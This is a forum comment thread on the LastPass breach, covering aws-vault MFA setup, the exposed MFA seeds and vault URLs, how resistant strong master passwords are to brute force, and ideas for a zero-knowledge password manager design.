You use aws-vault (https://github.com/99designs/aws-vault) and configure it with IAM and MFA via YubiKeys, e.g. configuring the profile jonsmith.

When you run

aws-vault exec jonsmith -- aws s3 ls

it will ask you, e.g. every hour, to confirm with the YubiKey and cache the credentials for an hour; after that the temporary keys expire. Can you also store keys other than AWS keys?
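I imagine the config side is just the standard mfa_serial profile setting, something like this in ~/.aws/config (account ID and ARN made up)?

  [profile jonsmith]
  region = eu-west-1
  mfa_serial = arn:aws:iam::123456789012:mfa/jonsmith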


For anyone who had been deep into LastPass with their passwords: I recently switched myself and convinced my family to as well. We switched to another [read the recommendations] online centralized password manager. It takes a couple of hours of your time off; you can totally stream some show in the meantime to pass the time.

One benefit is that it made me audit my online accounts -- I removed many.

So: Be prepared to switch if you want this type of service. New normal.


> DevOps engineer

So LastPass, a security company, has people who are tasked with both delivering features as fast as possible using a variety of development tools (dev) and administering the production systems where critical data lives (ops). On the same machine, from home.

It seems that this breach is not really an accident but more a logical conclusion.


If LastPass were well designed, the company would store no private user data.

I.e., they would be a 'dumb' storage system for the customer's encrypted data. The data would be encrypted by the customer before upload and then decrypted again by the customer after download.

Users would be identified by a unique random ID, and users would auth by signing a challenge with a secret key known only to the customer.

That way, even if a bad guy worked for LastPass and had full admin access to all servers, they couldn't steal anything.

And in fact, if this system were properly designed, it could all run on open-source server code, with the datastore fully open for anyone to inspect, to prove that the security comes down to cryptography rather than trusted yet fallible humans.
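The auth part could be as simple as this challenge-response sketch (using the third-party 'cryptography' package; all names illustrative):

  import secrets
  from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

  signing_key = Ed25519PrivateKey.generate()  # known only to the customer
  verify_key = signing_key.public_key()       # all the server ever stores

  challenge = secrets.token_bytes(32)         # fresh nonce from the server
  signature = signing_key.sign(challenge)
  verify_key.verify(signature, challenge)     # raises InvalidSignature if bad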


What part of this is not happening right now with LastPass?


Does this breach mean that LastPass effectively "transforms" 2FA into 1FA?

Because the attacker did not need a separate __physical__ MFA (2nd F) after collecting the master password (1st F).


Pretty much, since MFA options are limited to OTP only. The attacker getting access to customers' shared secrets means they basically just have to guess the master password.

>Backup of LastPass MFA/Federation Database – contained copies of LastPass Authenticator seeds, telephone numbers used for the MFA backup option (if enabled), as well as a split knowledge component (the K2 “key”) used for LastPass federation (if enabled). This database was encrypted, but the separately-stored decryption key was included in the secrets stolen by the threat actor during the second incident.

Unless I am misunderstanding this, they tell business users that they need to reset the shared secrets for their OTP providers.

>For users of Duo Security, Symantec VIP, RSA SecurID, or SecureAuth, regenerate the shared secret for each respective MFA solution and paste the new shared secret into the respective MFA app configuration in the Admin Console.


Why anyone ever trusted any of these products is beyond me - it's a huge SPOF, and you're literally betting your business that they don't get compromised...


How many major incidents is this for LastPass already?


I really wonder how many companies have figured out how to properly secure equipment and access used by a distributed work force.


Am I understanding correctly:

A single engineer had both access to the prod database AND the data decryption values?


Depends on what you mean by "the data decryption values". If you mean the encryption keys for the vaults themselves, no. Those are derived from the individual master passwords (in non-SSO setups, with SSO it's more complicated, and I don't fully understand the impact). So the attackers have a bunch of encrypted vaults from a backup. They can now brute-force the vaults, but if the original Master Passwords were secure (16+ characters, all 4 classes), those vaults should remain secure. Of course, many people use bad passwords, and those people are at risk.
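Back-of-the-envelope on why the strong-password case holds (the guess rate is a deliberately generous assumption; PBKDF2 at ~100k iterations makes real rates far lower):

  keyspace = 95 ** 16                 # random 16-char printable-ASCII password
  guesses_per_sec = 1e10              # assumed: very large cracking rig
  years = keyspace / guesses_per_sec / (3600 * 24 * 365)
  print(f"{years:.1e}")               # ~1.4e14 years to exhaust

A short human-chosen password, on the other hand, falls to a dictionary attack almost immediately, which is why the bad-password crowd is at real risk.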


The exposed passwords aren't even the worst part. It's the fact that the site URLs in users' vaults are unencrypted, so now attackers know every website you thought was important enough to save.

They know what bank you use, which adult sites you visit, what medical conditions you might have.


I understand that some people feel that that is sensitive data. It's not a big threat for me. My ISP and Google already have that data in many cases (IP destination data, DNS lookups, etc.). YMMV.


ah, thanks for the clarification.


Wait, was he not using a password manager or something?

I hear lastpass is pretty good, if he needs recommendations.


People are likely to use weak passwords with Plex, just like they do with Netflix, so they can easily share the details with other users and enter them from memory on things like TVs and tablets.

I think people generally consider it low-risk, because "who cares if someone can see what I was watching", but if you can get RCE on a computer running Plex Media Server just by logging in to the Plex account, then of course that's a huge attack surface, and your Plex login should be a secure, randomly generated password with 2FA enabled.

Of course, this can be avoided by paying for the premium Plex subscription, which allows you to create accounts for other non-admin users; but for people trying to avoid spending money (probably a large share of the Plex user base), anyone with the login can change settings and administer the server.


Imagine trusting a company with multiple incidents with all your passwords.


I can't believe it's taken 6 months for them to divulge this.


Definitely way past time to switch from passwords to mTLS or WebAuthn


It's secure because the Engineering Manager said so.


LastPass - The gift that keeps on giving



